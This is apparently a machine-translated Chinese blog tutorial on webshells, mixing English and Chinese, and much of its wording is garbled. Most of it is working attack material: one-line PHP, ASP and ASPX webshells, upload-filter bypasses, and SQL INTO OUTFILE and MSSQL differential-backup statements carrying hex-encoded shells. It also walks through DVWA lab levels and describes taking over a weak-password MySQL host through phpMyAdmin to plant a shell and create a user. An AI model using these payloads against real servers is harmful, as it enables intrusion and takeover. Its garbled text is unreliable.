2022-08-02 03:12:00 【wespten】
一、Webshell 简介
One day, the company's network operation and maintenance personnel found that the company's business system was attacked,被挂了木马,lead to a company data breach,and the hacker left a backdoor.
Webshellthat is to sayasp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境,可以对web服务器进行操作的权限,也可以将其称做为一种网页后门.Webshell一般是被网站管理员用于网站管理、服务器管理等等一些用途,但是由于Webshell的功能比较强大,可以上传下载文件,查看数据库,甚至可以调用一些服务器上系统的相关命令(比如创建用户,修改删除文件之类的),通常被黑客利用.
黑客在入侵了一个网站后,Some upload methods willasp或php后门文件与网站服务器WEB目录下正常的网页文件混在一起,将自己编写的Webshell上传到web服务器的页面的目录下,然后通过页面访问的形式进行入侵,或者通过插入一句话连接本地的一些相关工具直接对服务器进行入侵操作,以达到控制网站服务器的目的.
二、Webshell 种类
But here the Trojan is all some volume“庞大”的木马,Also known as hackers" 大马 ".
Big horses are many times bigger than ponies,But the corresponding function is also very powerful,including data management,命令的操作,数据库的管理,解压缩,and privilege escalation,都非常强大.Once the Malaysia sites were planted,The website is basically under the control of this Malaysia.The concealment of the Malaysian is bad,Because involves many sensitive code,Security programs are easy to scan.
A word from a Chinese kitchen knife does not count,The kitchen knife is also very powerful to operate through the client in one sentence,A code can be realized and Malaysia.The pony and the big horse we are talking about here refer to the page types in,The pony is to cooperate with uploading the horse,This is its main function,Also, the pony can be used as a backup backdoor,Generally Malaysians are easy to spot,The pony is easier to hide in the system's folders.
,提交密码123456After entering the function list of Malaysia,The following figure shows the file management function:
a word pony(小马)
Because of the above mentionedwebshellMalaysia mentioned in the concept has been very closely watched in today's security field,And all kinds of anti-virus software and firewall software are against this“大马”有了甄别能力,So if the infiltratedwebIf defense software is installed on the server,Keep this big horse as your ownwebshell就非常困难了,So a newwebshell就横空出世了,That's a word Trojan horse.
To put it simply, a Trojan horse is to insert a Trojan horse into the server by submitting a short code in the upload function of the website and finally getwebshell的方法.对于不同的语言有不同的构造方法,基本构造是首先出现的是脚本开始的标记,后边跟着的 eval 或者是 execute 是核心部分,就是获取并执行后边得到的内容,而后边得到的内容,是 request 或者是 $_POST 获取的值.如果我们通过客户端向服务器发送,那么就会让服务器执行我们发送的脚本,挂马就实现了.
One sentence Trojans for some different scripting languages,These can all rely on the upload function of the website,Similar places for uploading file information interaction,比如头像(图片马),文件等,绕过前端JS的验证,后端的winParsing or other vulnerabilities to bypass.Then connect through the kitchen knife to get a simplewebshell.
php一句话木马: <?php eval(@$_POST['password']);?>
asp一句话木马: <%eval request ("value")%> 或 <% execute(request("value")) %>
aspx一句话木马: <%@ Page Language="Jscript"%><%eval(Request.Item["chopper"],"unsafe");%>
<?php fputs( fopen('xie.php','w') , '<? php eval($_POST[xie]) ?>' ) ; ?>
但是现在的WAFWell equipped,Many will detect these common phrases..
One word Trojan running
拿phpA word from the Trojan explain the principle:
在PHP脚本语言中,eval(code) 的功能是将 code 组合成 php 指令,then execute the command,This principle is also used in other languages,just the function may be different.
<?php $a=”phpinfo()”; eval(“echo $a; “); ?>
就相当于执行 echo phpinfo()语句.
Let's take a look at the simplest one sentence Trojan horse:
<?php @eval($_POST['attack']);?>
php的代码要写在<?php ?>里面,服务器才能认出来这是php代码,然后才去解析.
eval()The function means that the statement string inside the parentheses are all treated asPHP代码执行.
例如:eval("echo 'a'");In fact, it is directly echo 'a';再来看看<?php eval($_POST['pw']); ?>首先,用post方式接收变量pw,比如接收到了:pw=echo 'a'; 这时代码就变成<?php eval("echo 'a';"); ?>.结果如下:
连起来意思就是:用post方法接收变量pw,把变量pw里面的字符串当做php代码来执行.So you can play:也就是说,you want to execute什么代码,就把什么代码放进变量pw里,用post传输给一句话木马.Do you want to check if there are any pornographic films in the target hard drive?,可以用php函数:opendir()和readdir()等等.想上传点小黄片,诬陷站主,就用php函数:move_uploaded_file,当然相应的html要写好.you want to executecmd命令,则用exec().
当然前提是:php配置文件php.ini里,关掉安全模式safe_mode = off,然后再看看 禁用函数列表 disable_functions = proc_open, popen, exec, system, shell_exec ,把exec去掉,确保没有exec(有些cms为了方便处理某些功能,会去掉的).
echo '<pre>';
echo '</pre>';
Here we can see that the system directly executes the system command.SO,Everyone should understand by now,Why are you saying something short and concise?!
利用文件上传漏洞,将<?php @eval($_POST[value]);?> A sentence inserted into thewebWhen the server executes the file,then we can submit to this filepost数据,postThe parameters for submitting data in this way are in this sentence value,It is called a Trojan's password.How to submit the data if it is correctphp语言的语句,Then it can be executed by a word Trojan,So as to achieve the malicious purpose of hackers,Also available locally through Chinese kitchen kniveschopper.exe即可获取和控制整个网站目录.
After introducing the principle of a Trojan horse,Let's talk about its pros and cons:
缺点:Easily detected by security software.为了增强隐蔽性,There are also various deformations of the one-word Trojan horse..
黑客的目的,It is to try my best to insert a Trojan horse into the target website,可以是一个单独的 .asp 或者是 .php,.aspx 文件,Or are hidden under a certain web page.
在上边的例子中,php Documentation is obvious eval can be a static signature,webshellScanning tools can use this as a keyword,Scan this Trojan and block it.
(1) IIS目录解析漏洞
(2) 文件解析漏洞
(3) 文件名解析
Since no whitelist is used to filter file types,导致asa,cer,等文件类型,not restricted,asa,cerThe mapping processing of type files follows by defaultaspMapping is the same,将webshellDisguised as this type of file upload.
(4) fast-CGI解析漏洞
在web服务器开启fast-CGI的时候,上传图片xx.jpg,并写入一句话.访问路径xx.jpg/.php,就会在该路径下生成一个一句话木马shell.php.这个漏洞在IIS 7.0/7.5,Nginx8.03以下版本存在.
(5) Apache解析漏洞
Now many script upload modules are not only allowed to upload legal file types,And most systems allow adding upload types.
在上传图片的时候,比如命名1.asp .jpg(asp后面有个空格),在上传的时候,用NC或者burpsuite抓到表单,将上传名asp后面加上%00(在burpsuite里面可以直接编辑HEX值,空格的HEX值为20,将20改为00),如果HEX为00的时候表示截断,20表示空格,如果表示截断的时候就为无视脚本中的JPG验证语句,直接上传ASP.
php.g1fupload type,这是php的一个特性,The last one is fine as long as it is not a known file type,php会将php.g1f作为php来正常运行,so that it can be successfully obtainedshell.
Mainly is to use the background toaccess数据库的“备份数据库”或“恢复数据库”功能,“备份的数据库路径”Variables such as no filtering can cause the suffix to arbitrary filesasp,从而得到webshell,msssqlversion of the program is directly appliedaccess版的代码,导致sqlversion is still available.Can also backup websitesaspfile for He suffix 如.txt文件,Thus can view and get a web page source code,and access to more program information increases access towebshell的机会.
In practical applications, there are often times when there is no upload function.,但是有asp系统在运行,Use this method to view the source code to get the location of its database,Create opportunities for database plug-ins,There is a mobile BBSip地址的数据库,在后台的ipYou can insert the smallest horse in the management and then back it up as,asp文件即可.
Talking about the method of breaking the upload detection,很多aspThe program will prompt that the file is illegal even after changing the suffix name,通过在.asp文件头加 上gif89a修改后缀为gif来骗过aspProgram detection to achieve the purpose of uploading,Another option is to open the image file with Notepad,Paste any part of it and copy it toaspTrojan file header,修改gifUploading after the suffix can also break through the detection,then backup as.asp文件,成功得到webshell.
(1) MySQL数据库into outfile
The background needs to havemysql数据查询功能,we can use it to executeSELECT …… INTO OUTFILE查询输出php文件,Because all data is stored inmysql里的,So we can put ourwebshell代码插入mysql在利用 SELECT …… INTO OUTFILE语句导出shell.在mysqlinput in operationselect 0x3C3F6576616C28245F504F53545B615D293B3F3E from mysql.user into outfile '路径‘ you can get a<?eval($_POST[a]);?>the smallest horse' 0x3C3F6576616C28245F504F53545B615D293B3F3E是我们<?eval($_POST[a]);?>的十六进制,这种方法对phpmyadmin比较普遍,先利用phpmyadminPath Disclosure Vulnerability,比较典型的 是http://url/phpmyadmin/libraries/select_lang.lib.php,Can cause a path,phpIt is easier to break out the absolute path in the environment:).
It is worth mentioning that the encounter ismysql在winThe path under the system should be written like thisd:\\wwwroot \\a.php.The following method is a more commonly used exportwebshell的方法,也可以写个vbsAdd the script for the system administrator is exported to the startup folder,After the system restarts, a administrator accounts:
INSERT INTO a(cmd) VALUES('<?fputs(fopen("./a.php","w"),"<?eval(\$_POST[a]);?>")?>')
select cmd from a into outfile '路径/b.php' DROP TABLE IF EXISTS a访问b.php就会生成一个<?eval($_POST[a]);?>the smallest horse.
Can be executed if encounteredphpThe command is much simpler,典型的代表是BO-BLOG,在后台的phpEnter the following code in the command box:
<?$sa = fopen("./up/saiy.php","w");fwrite($sa,"<?eval(\$_POST[a]);?".">");fclose($sa);?>
就会在up目录下生成文件名为saiy.php内容为<?eval($_POST[a]);?>的最小php木马,最后用lanker client to connect.In actual use, it is necessary to consider whether the folder has write permission.or enter code like this 码<?fputs(fopen("./a.php","w"),"<?eval(\$_POST[a]);?>")?> 将会在当前目录生成一个a.phpthe smallest horse.
(2) 建立新表写入木马
一些开源cms或者自制的webshell会有数据库管理功能,在数据库管理功能里面有sql查询功能,先使用create table shell(codetext);创建一个名字叫做shell的表,表里面有列明叫做code,类型为text.
然后使用insert into shell(code) values(‘一句话马’),这里讲shell表中的code列赋值为一句话的马,然后通过自定义备份,将该表备份为x.php;x然后就被解析成为php然后执行了,这里不是x.php;x就一定能够解析为php,不同的web服务器上面的服务程序不同,然后过滤规则也不同,可能会使用其他的方式.
(3) phpMyadmin设置错误
Take advantage of database compression
The download protection of the data can be disabled so that the minimal horse inserted into the database can run successfully,比较典型的就是loveyuki的L-BLOG,added in friendshipurlwrite out 上<%eval request (chr(35))%>, 提交后,Compress the database during database operations,can be successfully compressed.asp文件,The smallest horse with the oceanevalThe client even gets awebshell.
mssqlSystem differential backup generationwebshell
Need a bit of mobile heremssql版,But it can be directly submitted locally for backup.In post that uploading a write in the first placeaspfake picture of code,then remember its upload path.write a local submitted form,代码如下:
<form action=http://网站/bbs/admin_data.asp?action=RestoreData&act=Restore method="post"> <p>The location of the uploaded file:<input name="Dbpath" type="text" size="80"></p> <p>To answerto the location:<input name="backpath" type="text" size="80"></p> <p><input type="submit" value="提交"></p> </form>
另存为.htm本地执行,Fill in the fake image upload path in“The location of the uploaded file”那里,want to backupWebShellThe relative path is filled in“To answer to the location”那里,Submit to get our lovelyWebShell了,The recovery code is similar to this,It is ok to modify the relevant areas.
no background executionmssqlCommand is strongasp程序后台,Mobile database restore and backup is a decoration,不能执行sql命令备份webshell,Can only execute some simple query commands.可以利用mssqlInto the differential backupwebshell,Generally, the background shows the absolute path.,As long as there is an injection point, the differential backup can basically be successful.The following is the main statement code for differential backup,Use the moving net7.0An injection vulnerability can backup one with differentialwebshell,You can use the method mentioned above,将conn.asp文件备份成.txtfile to get the library name.
The main code for differential backup:
;declare @a sysname,@s varchar(4000) select @a=db_name(),@s=0x626273 backup database @a to [email protected]——
;Drop table [heige];create table [dbo].[heige] ([cmd] [image])——
;insert into heige(cmd) values(0x3C2565786563757465207265717565737428226C2229253E)——
;declare @a sysname,@s varchar(4000) select @a=db_name(),@s=0x643A5C7765625C312E617370 backup database @a to [email protected] WITH DIFFERENTIAL,FORMAT
这段代码中,0x626273To backup library namebbs的十六进制,can be other names such asbbs.bak; 0x3C2565786563757465207265717565737428226C2229253E是<%execute request("l")%>的十六进制,是ipThe pony;0x643A5C7765625C312E617370是d:\web\1.asp的十六进制,That's what you want to back upwebshell路径.
Of course, you can also use the more common backup methods to obtainwebshell,The only downside is that the backup file is too large,If the backup database has anti-download data tables,or wrongasp代码,备份出来的webshellwill not run successfully,Using differential backup is a method with a relatively high success rate,And greatly reduce the size of backup files.
四、DVWAfile upload vulnerability uploadWebShell
代码分析:在上传文件时,服务器对上传文件的类型、内容没有做任何的检查、过滤,存在明显的文件上传漏洞,and after generating the upload path,服务器会检查是否上传成功并返回相应提示信息.
File Upload Vulnerability Restrictions:
- 能够成功上传木马文件
- 上传文件必须能够被执行
- 上传文件的路径必须可知
if( isset( $_POST[ 'Upload' ] ) ) {
// Where are we going to be writing to?
$target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
$target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );
// Can we move the file to the upload folder?
if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
// No
echo '<pre>Your image was not uploaded.</pre>';
else {
// Yes!
echo "<pre>{$target_path} succesfully uploaded!</pre>";
先整一个phpversion of a word trojan,注意要是php类型的.
我们可以发现,上传成功,and returns the upload path of the server,如下图:
Right click on Chinese kitchen knife——添加——输入shell地址:这个shell地址是怎么来的:You upload the file in your browser,see the address above,vulnerabilities/upload/#The first two are also their ownIP和DVWA-master,有的人是dvwa,Plus the server upload pathhackable/uploads/mua.php),The red box is just nowphp文件里POST后面的密码.
1、是连接的URL,It is the main path of the website and then add the save path echoed when uploading the file;
2、It is the password when the kitchen knife is connected,It is the data submitted in one sentence in the picture above(本例为"jyx");
3、is the parsing type of a sentence,可以是asp,php,aspx.Different parsing types have different content in a sentence,different file extensions.
You can also open a terminal.
代码分析:The function imposes restrictions on the type and size of uploaded files,类型必须是image/jpeg或者image/png,and the upload file size cannot exceed100000B(大约等于97.6KB)
if( isset( $_POST[ 'Upload' ] ) ) {
// Where are we going to be writing to?
$target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
$target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );
// File information
$uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
$uploaded_type = $_FILES[ 'uploaded' ][ 'type' ];
$uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];
// Is it an image?
if( ( $uploaded_type == "image/jpeg" || $uploaded_type == "image/png" ) &&
( $uploaded_size < 100000 ) ) {
// Can we move the file to the upload folder?
if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
// No
echo '<pre>Your image was not uploaded.</pre>';
else {
// Yes!
echo "<pre>{$target_path} succesfully uploaded!</pre>";
else {
// Invalid file
echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
First we put thephp文件修改为png类型,上传,成功.
Now go directly to a kitchen knife must be connected,Because the kitchen knife can't parse itpng类型的文件.
At this time, the operation of file inclusion begins,Type in the add address bar of the kitchen knife:
Can be taken in theoryweb shell,But I try many times without the connection is successfulQAQ(咱也不知道为什么,It is said to be the platform).
Connect with a kitchen knife.
Can upload a file namedhack.php%00.png,上传,抓包,You can see that the type meets the requirements,并且上传成功,The chopper to connect again.
if( isset( $_POST[ 'Upload' ] ) ) {
// Where are we going to be writing to?
$target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
$target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );
// File information
$uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
$uploaded_ext = substr( $uploaded_name, strrpos( $uploaded_name, '.' ) + 1);
$uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];
$uploaded_tmp = $_FILES[ 'uploaded' ][ 'tmp_name' ];
// Is it an image?
if( ( strtolower( $uploaded_ext ) == "jpg" || strtolower( $uploaded_ext ) == "jpeg" || strtolower( $uploaded_ext ) == "png" ) &&
( $uploaded_size < 100000 ) &&
getimagesize( $uploaded_tmp ) ) {
// Can we move the file to the upload folder?
if( !move_uploaded_file( $uploaded_tmp, $target_path ) ) {
// No
echo '<pre>Your image was not uploaded.</pre>';
else {
// Yes!
echo "<pre>{$target_path} succesfully uploaded!</pre>";
else {
// Invalid file
echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
增加了strrpos()函数和getimagesize()函数,It is found from the source code that stricter restrictions on the format of file uploads have been made,It is required that the upload file name form must be”*.jpg”、”*.jpeg” 、”*.png”其中之一,And it restricts the file header of the uploaded file to be an image type.
strrpos() 函数:查找字符串在另一字符串中最后一次出现的位置.Here it is found from the file name containing"."的字符.
getimagesize()函数:用于获取图像大小及相关信息,成功返回一个数组,失败则返回 FALSE 并产生一条 E_WARNING 级的错误信息.
we need to act,Combine a sentence Trojan file with a picture into a picture-type file,具体如下:
First change the suffix of the image file totxt类型.
打开这个txt文件,In the final to join a Trojan(<?php @eval($_POST['jyx']); ?> ).
Because it is a picture Trojan,PHPThe script cannot be parsed,Kitchen knife connection Trojan failed.
Since the picture Trojan can't be parsed,那该怎么办?HighThe level program only allows uploading pictures.……别慌,此处结合DVWAThe files that come with the shooting range contain vulnerabilities and can be uploaded successfullyPHPTrojan and kitchen knife are connected,The following is an attack demonstration.
First create a new picture Trojan horse by the above method,behind the image filePHP脚本更改为:
<?php fputs(fopen('muma.php','w'),'<?php @eval($_POST[hack]);?>'); ?>
Then make new image Trojan,如下图所示:
Then upload toDVWA,Then access the Trojan file with the help of the file containing the vulnerability module:
此时在DVWAThe file is automatically generated under the path containing the vulnerabilityPHPOne sentence Trojan script filemuma.php
Connect the kitchen knife at this time,即可成功连接:
把WebShell转换为txtoperations that carry out transmission in the form of.
find one3306端口的MYSQLweak password host,我们用MYSQL来远程连接:
The above prompt has passedMYSQLTalk to connect to the host.
Shown when we import files remotely,Prompt us not enough permissions,cannot create and execute functions.Many times will give up and switch to other hosts,Why don't we spend more time,see if there are other ways?
Let's scan the port again,See if there are other available.
The host was turned on just now80端口,我们打开IEsee what homepage.
WEBThe root directory does not put the default page,Not set up to return the wrong page,所以把WEBThe folders in the directory are displayed.我们看看,有PHPMYADMIN的管理工具,Previously I wrote usingPHPMYADMINTo right way,我们来试试吧.
Let's click with the mouseIE上的phpMyadmin目录,to open the management page,On the right side of the page there is an item“显示PHP信息”this is crucial,we need it to be sureWEBwhere is the absolute path of,Know the absolute path,We can move on to the next step.
我们点一下“显示PHP信息”Shows all relevant information about this host,我们只需要查找WEBThe absolute path of this column information is enough.
WEBThe absolute path is in:c:/program files/apache group/apache/htdocs的目录下OK,After we have the absolute path,come onPHPMYADMINescalation of privileges.我们打开PHPMYADMINManagement of the database table on the left of the page,选其中一个,比如mysql或test都可以.
选好数据库后,Let's click on the top of the pageSQL选项,这是MYSQLrun statement query.
然后,We enter our order in the inquiry bar,The content is to create anzhack的表,里面创建一个niuzu的字段,Then write a wordPHP WEBSHELL,把WEBSHELL导出到WEB目录下名字nzhack.php.
输入完毕,we click execute.等待结果.
Disappointing results,提示运行错误,还是不成功,Then try to use the editing tool for hex conversion,put my usual onePHP-WebshellConvert to decimal code,转换后的代码为:0x3c3f0d0a2f2a0d0a2d2d2d2d2b2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2….略.然后复制到一个TXT文件里,再把MYSQL语句加上,Be careful to enter the other party'sWEB路径要准确.The finished content is:
准备好后,我们运行CMDcommand to connect to each other's database,输入指令:\. Nzhack.txt 按回车
运行后,Display is already successful export file.we open nowIE输入对方IP和WEBSHELL地址:http://
已经成功得到WEBSHELL,Let's try to create a user.
成功创建用户.The purpose of this article reminds me to think more when I encounter difficult problems,broad thinking,Don't limit one way,try several times,Chances of success are greatly improved.
JSP WebSehll 后门脚本
